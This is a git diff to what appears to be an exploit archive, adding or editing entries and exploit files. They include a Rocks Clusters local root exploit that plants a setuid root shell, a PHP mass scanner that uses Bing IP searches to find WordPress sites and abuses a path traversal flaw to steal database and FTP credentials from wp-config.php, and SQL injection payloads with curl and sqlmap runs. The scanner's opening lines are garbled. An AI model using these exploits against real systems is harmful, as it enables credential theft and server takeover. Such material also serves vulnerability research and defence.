diff --git a/files.csv b/files.csv
index f1e49ae42..e0e0fe69f 100755
--- a/files.csv
+++ b/files.csv
@@ -1720,7 +1720,7 @@ id,file,description,date,author,platform,type,port
2012,platforms/php/webapps/2012.php,"MyBulletinBoard (MyBB) <= 1.1.5 - (CLIENT-IP) SQL Injection Exploit",2006-07-15,rgod,php,webapps,0
2013,platforms/linux/local/2013.c,"Linux Kernel <= 2.6.17.4 - (proc) Local Root Exploit",2006-07-15,h00lyshit,linux,local,0
2014,platforms/windows/remote/2014.pl,"Winlpd 1.2 Build 1076 - Remote Buffer Overflow Exploit",2006-07-15,"Pablo Isola",windows,remote,515
-2015,platforms/linux/local/2015.py,"Rocks Clusters <= 4.1 (umount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0
+2015,platforms/linux/local/2015.py,"Rocks Clusters <= 4.1 - (umount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0
2016,platforms/linux/local/2016.sh,"Rocks Clusters <= 4.1 (mount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0
2017,platforms/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure Exploit (perl)",2006-07-15,UmZ,multiple,remote,10000
2018,platforms/php/webapps/2018.txt,"FlushCMS <= 1.0.0-pre2 (class.rich.php) Remote Inclusion Vulnerability",2006-07-16,igi,php,webapps,0
@@ -33608,7 +33608,11 @@ id,file,description,date,author,platform,type,port
37228,platforms/php/webapps/37228.txt,"concrete5 index.php/tools/required/files/add_to searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
37229,platforms/php/webapps/37229.txt,"concrete5 index.php/tools/required/files/permissions searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
37230,platforms/php/webapps/37230.txt,"concrete5 index.php/tools/required/dashboard/sitemap_data.php Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0
+37248,platforms/php/webapps/37248.txt,"SV: Milw0rm Clone Script v1.0 - (time based) SQLi",2015-06-09,"John Smith",php,webapps,0
37237,platforms/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
37238,platforms/hardware/webapps/37238.txt,"TP-Link ADSL2+ TD-W8950ND - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
+37239,platforms/windows/dos/37239.html,"Microsoft Internet Explorer 11 - Crash PoC",2015-06-08,"Pawel Wylecial",windows,dos,0
37240,platforms/hardware/webapps/37240.txt,"D-Link DSL-2730B AU_2.01 - Authentication Bypass DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
37241,platforms/hardware/webapps/37241.txt,"D-Link DSL-526B ADSL2+ AU_2.01 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
+37244,platforms/php/webapps/37244.txt,"Wordpress Plugin 'WP Mobile Edition' - LFI Vulnerability",2015-06-08,"Ali Khalil",php,webapps,0
+37245,platforms/php/webapps/37245.txt,"Pasworld detail.php - Blind Sql Injection Vulnerability",2015-06-08,"Sebastian khan",php,webapps,0
diff --git a/platforms/linux/local/2015.py b/platforms/linux/local/2015.py
index a431feb1d..3096eb7b0 100755
--- a/platforms/linux/local/2015.py
+++ b/platforms/linux/local/2015.py
@@ -1,14 +1,14 @@
-#!/usr/bin/env python
-##############################################################################
-## rocksumountdirty.py: Rocks release <=4.1 local root exploit
-## quick and nasty version of the exploit. make sure the . is writable and
-## you clean up afterwards. ;)
-##
-## coded by: xavier@tigerteam.se [http://xavsec.blogspot.com]
-##############################################################################
-x=__import__('os');c=x.getcwd()
-open('%s/x'%c, 'a').write("#!/bin/sh\ncp /bin/ksh %s/shell\nchmod a+xs %s/shell\nchown root.root %s/shell\n" % (c,c,c))
-print "Rocks Clusters <=4.1 umount-loop local root exploit by xavier@tigerteam.se [http://xavsec.blogspot.com]"
-x.system('umount-loop "\`sh %s/x\`"'%c);x.system("%s/shell"%c)
-
-# milw0rm.com [2006-07-15]
+#!/usr/bin/env python
+##############################################################################
+## rocksumountdirty.py: Rocks release <=4.1 local root exploit
+## quick and nasty version of the exploit. make sure the . is writable and
+## you clean up afterwards. ;)
+##
+## coded by: xavier@tigerteam.se [http://xavsec.blogspot.com]
+##############################################################################
+x=__import__('os');c=x.getcwd()
+open('%s/x'%c, 'a').write("#!/bin/sh\ncp /bin/ksh %s/shell\nchmod a+xs %s/shell\nchown root.root %s/shell\n" % (c,c,c))
+print "Rocks Clusters <=4.1 umount-loop local root exploit by xavier@tigerteam.se [http://xavsec.blogspot.com]"
+x.system('umount-loop "\`sh %s/x\`"'%c);x.system("%s/shell"%c)
+
+# milw0rm.com [2006-07-15]
diff --git a/platforms/php/webapps/37244.txt b/platforms/php/webapps/37244.txt
new file mode 100755
index 000000000..5d63513f5
--- /dev/null
+++ b/platforms/php/webapps/37244.txt
@@ -0,0 +1,110 @@
+######################################################################################
+# Exploit Title: Wordpress Plugin 'WP Mobile Edition' LFI Vulnerability #
+# Date: june 6, 2015 #
+# Exploit Author: ViRuS OS #
+# Google Dork: inurl:?fdx_switcher=mobile #
+# Vendor Homepage: https://wordpress.org/plugins/wp-mobile-edition/ #
+# Software Link: https://downloads.wordpress.org/plugin/wp-mobile-edition.2.2.7.zip #
+# Version: WP Mobile Edition Version 2.2.7 #
+# Tested on : windows #
+######################################################################################
+Description :
+Wordpress Plugin 'WP Mobile Edition' is not filtering data so we can get the configration file in the path
+< site.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php>
+
+# Exploite Code :
+> CoderLeeT | Fallag Gassrini | Taz| S4hk | Sir Matrix | Kuroi'SH
+";
+echo "Follow Me On FaceBook : https://www.facebook.com/VirusXOS\n\n";
+echo "Follow Me On FaceBook : https://www.facebook.com/Weka.Mashkel007\n\n";
+echo "#################### Welcome Master ViRuS OS ################\n\n";
+echo "Server Target IP : ";
+$ip=trim(fgets(STDIN,1024));
+$ip = explode('.',$ip);
+$ip = $ip[0].'.'.$ip[1].'.'.$ip[2].'.';
+for($i=0;$i <= 255;$i++)
+{
+$sites = array_map("site", bing("ip:$ip.$i wordpress"));
+$un=array_unique($sites);
+echo "[+] Scanning -> ", $ip.$i, ""."\n";
+echo "Found : ".count($sites)." sites\n\n";
+foreach($un as $pok){
+$host=findit($file,"DB_HOST', '","');");
+$db=findit($file,"DB_NAME', '","');");
+$us=findit($file,"DB_USER', '","');");
+$pw=findit($file,"DB_PASSWORD', '","');");
+$bda="http://$pok";
+ $linkof='/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php';
+ $dn=($bda).($linkof);
+ $file=@file_get_contents($dn);
+ if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
+ echo "[+] Scanning => ".$bda."\n\n";
+ echo "[+] DB NAME : ".findit($file,"DB_NAME', '","');")."\n\n";
+ echo "[+] DB USER : ".findit($file,"DB_USER', '","');")."\n\n";
+ echo "[+] DB PASS : ".findit($file,"DB_PASSWORD', '","');")."\n\n";
+ echo "[+] DB host : ".findit($file,"DB_HOST', '","');")."\n\n";
+ $db="[+] DB NAME : ".findit($file,"DB_NAME', '","');")."\n\n";
+ $user="[+] DB USER : ".findit($file,"DB_USER', '","');")."\n\n";
+ $pass="[+] DB PASS : ".findit($file,"DB_PASSWORD', '","');")."\n\n";
+ $host="[+] DB host : ".findit($file,"DB_HOST', '","');")."\n\n";
+ $ux = "".$bda."\r\n";
+ $ux1 = "".$db."\r\n";
+ $ux2 = "".$user."\r\n";
+ $ux3 = "".$pass."\r\n";
+ $ux4 = "".$host."\r\n";
+ $save=fopen('exploited.txt','ab');
+ fwrite($save,"$ux");
+ fwrite($save,"$ux1");
+ fwrite($save,"$ux2");
+ fwrite($save,"$ux3");
+ fwrite($save,"$ux4");
+ }
+ elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
+ echo "FTP user : ".findit($file,"FTP_USER','","');")."\n\n";
+ echo "FTP pass : ".findit($file,"FTP_PASS','","');")."\n\n";
+ echo "FTP host : ".findit($file,"FTP_HOST','","');")."\n\n";
+ }
+ else{echo $bda." : Exploit failed \n\n";}
+}
+}
+function findit($mytext,$starttag,$endtag) {
+ $posLeft = stripos($mytext,$starttag)+strlen($starttag);
+ $posRight = stripos($mytext,$endtag,$posLeft+1);
+ return substr($mytext,$posLeft,$posRight-$posLeft);
+}
+function site($link){
+return str_replace("","",parse_url($link, PHP_URL_HOST));
+}
+function bing($what){
+for($i = 1; $i <= 2000; $i += 10){
+$ch = curl_init();
+curl_setopt ($ch, CURLOPT_URL, "http://www.bing.com/search?q=".urlencode($what)."&first=".$i."&FORM=PERE");
+curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (http://search.msn.com/msnbot.htm)");
+curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt ($ch, CURLOPT_COOKIEFILE,getcwd().'/cookie.txt');
+curl_setopt ($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
+$data = curl_exec($ch);
+preg_match_all('#;a=(.*?)" h="#',$data, $links);
+foreach($links[1] as $link){
+$allLinks[] = $link;
+}
+if(!preg_match('#"sw_next"#',$data)) break;
+}
+
+if(!empty($allLinks) && is_array($allLinks)){
+return array_unique(array_map("urldecode", $allLinks));
+}
+}
+?>
\ No newline at end of file
diff --git a/platforms/php/webapps/37245.txt b/platforms/php/webapps/37245.txt
new file mode 100755
index 000000000..6ba9c8cd7
--- /dev/null
+++ b/platforms/php/webapps/37245.txt
@@ -0,0 +1,53 @@
+=========================================================
+
+[+] Title :- Pasworld detail.php Blind Sql Injection Vulnerability
+[+] Date :- 5 - June - 2015
+[+] Vendor Homepage: :- http://main.pasworld.co.th/
+[+] Version :- All Versions
+[+] Tested on :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows
+[+] Category :- webapps
+[+] Google Dorks :- intext:"Powered By :: PAS World Communitcation" inurl:detail.php
+ site:go.th inurl:"detail.php?id="
+[+] Exploit Author :- Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN)
+[+] Team name :- Team Alastor Breeze
+[+] The official Members :- Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R
+[+] Greedz to :- @@lu, Lalit, MyLappy<3, Diksha
+[+] Contact :- fb.com/shelesh.rauthan, indian.1337.hacker@gmail.com, shortycharsobeas@gmail.com
+
+=========================================================
+
+[+] Severity Level :- High
+[+] Request Method(s) :- GET / POST
+[+] Vulnerable Parameter(s) :- detail.php?id=
+[+] Affected Area(s) :- Entire admin, database, Server
+
+
+=========================================================
+
+[+] About :- Unauthenticated SQL Injection via "detail.php?id=" parameter
+
+[+] SQL vulnerable File :- /home/DOMAIN/domains/DOMAIN.go.th/public_html/detail.php
+
+[+] POC :- http://127.0.0.1/detail.php?id=[SQL]'
+
+SQLMap
+++++++++++++++++++++++++++
+python sqlmap.py --url "http://127.0.0.1/detail.php?id=[SQL]" --dbs
+++++++++++++++++++++++++++
+
+Parameter: id (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: id=152 AND 1414=1414
+
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
+ Payload: id=152 AND (SELECT 1163 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (CASE WHEN (1163=1163) THEN 1 ELSE 0 END)),0x7162707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
+
+ Type: UNION query
+ Title: MySQL UNION query (random number) - 9 columns
+ Payload: id=-7470 UNION ALL SELECT 5982,5982,5982,5982,5982,CONCAT(0x7162766271,0x4b437a4a565555674571,0x7162707671),5982,5982,5982#
+
+
+
+=========================================================
\ No newline at end of file
diff --git a/platforms/php/webapps/37248.txt b/platforms/php/webapps/37248.txt
new file mode 100755
index 000000000..9e2ede231
--- /dev/null
+++ b/platforms/php/webapps/37248.txt
@@ -0,0 +1,115 @@
+<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+| Exploit Title: Milw0rm Clone Script v1.0 - (time based) SQLi |
+| Date: 05.19.2015 |
+| Exploit Daddy: pancaker |
+| Vendor Homepage: http://milw0rm.sourceforge.net/ |
+| Software Link: http://sourceforge.net/projects/milw0rm/files/milw0rm.rar/download |
+| Version: v1.0 |
+| Tested On: Ubuntu 10.04 |
+|><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><|
+| SHOUTout: milw0rm &&& your mums pancakes |
+| CALLINGout: hak5 {crap to the core} &&& 1337day/inj3ct0r {scamm3rs + l33ch3rs} |
+<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+
+
+
+
+### vuln codez related.php ###
+
+
+
+<? echo SiteInfo('site_name');?> - exploits : vulnerabilities : videos : papers : shellcode
+..zzz...
+
+
+
+
+
+### manual ###
+
+root@woop:~# zzz='10'
+root@woop:~# lulz="program=hak5'%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP($zzz)))a)%20AND%20'shit'='shit"
+root@woop:~# time curl "http://localhost/milw0rm/related.php?$lulz"
+
+real 0m10.008s
+user 0m0.004s
+sys 0m0.004s
+
+
+
+
+
+
+### sqlmap ###
+
+root@woop:~/sqlmap# python sqlmap.py -u 'http://localhost/milw0rm/related.php?program=lol' --current-user --is-dba
+ _
+ ___ ___| |_____ ___ ___ {1.0-dev-e8f87bf}
+|_ -| . | | | .'| . |
+|___|_ |_|_|_|_|__,| _|
+ |_| |_| http://sqlmap.org
+
+[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+
+[*] starting at 09:46:53
+
+[09:46:53] [INFO] resuming back-end DBMS 'mysql'
+[09:46:53] [INFO] testing connection to the target URL
+[09:46:53] [INFO] heuristics detected web page charset 'UTF-8'
+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
+---
+Parameter: program (GET)
+ Type: AND/OR time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
+ Payload: program=lol' AND (SELECT * FROM (SELECT(SLEEP(5)))yYCj) AND 'mQUB'='mQUB
+
+ Type: UNION query
+ Title: MySQL UNION query (NULL) - 8 columns
+ Payload: program=lol' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x77775a6355684c45565a,0x7176717671),NULL,NULL,NULL,NULL,NULL,NULL#
+---
+[09:46:53] [INFO] the back-end DBMS is MySQL
+web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
+web application technology: PHP 5.3.2, Apache 2.2.14
+back-end DBMS: MySQL 5.0.12
+[09:46:53] [INFO] fetching current user
+current user: 'root@localhost'
+[09:46:53] [INFO] testing if current user is DBA
+[09:46:53] [INFO] fetching current user
+[09:46:53] [WARNING] reflective value(s) found and filtering out
+current user is DBA: True
+[09:46:53] [INFO] fetched data logged to text files under '/root/.sqlmap/output/localhost'
+
+
+
+
+
+<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+| >>> THIS 'EXPLOIT' IS SHIT LIKE ALL OF HAK5 'SHOWS' <<< |
+| <<< NOT TO BE (RE)PUBLISHED ON 1337DAY/INJ3CT0R >>> |
+<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+
+ __
+___________ ____ ____ _____ | | __ ___________
+\____ \__ \ / \_/ ___\\__ \ | |/ // __ \_ __ \
+| |_> > __ \| | \ \___ / __ \| <\ ___/| | \/
+| __(____ /___| /\___ >____ /__|_ \\___ >__|
+|__| \/ \/ \/ \/ \/ \/
+.........................cant be pr0 without ascii art
+
+
+ Den tisdag, 9 juni 2015 8:17 skrev john smith :
+
+
+ sir - y u no pub?https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4137
+
+
+
+
\ No newline at end of file
diff --git a/platforms/windows/dos/37239.html b/platforms/windows/dos/37239.html
new file mode 100755
index 000000000..7a92f8b54
--- /dev/null
+++ b/platforms/windows/dos/37239.html
@@ -0,0 +1,37 @@
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file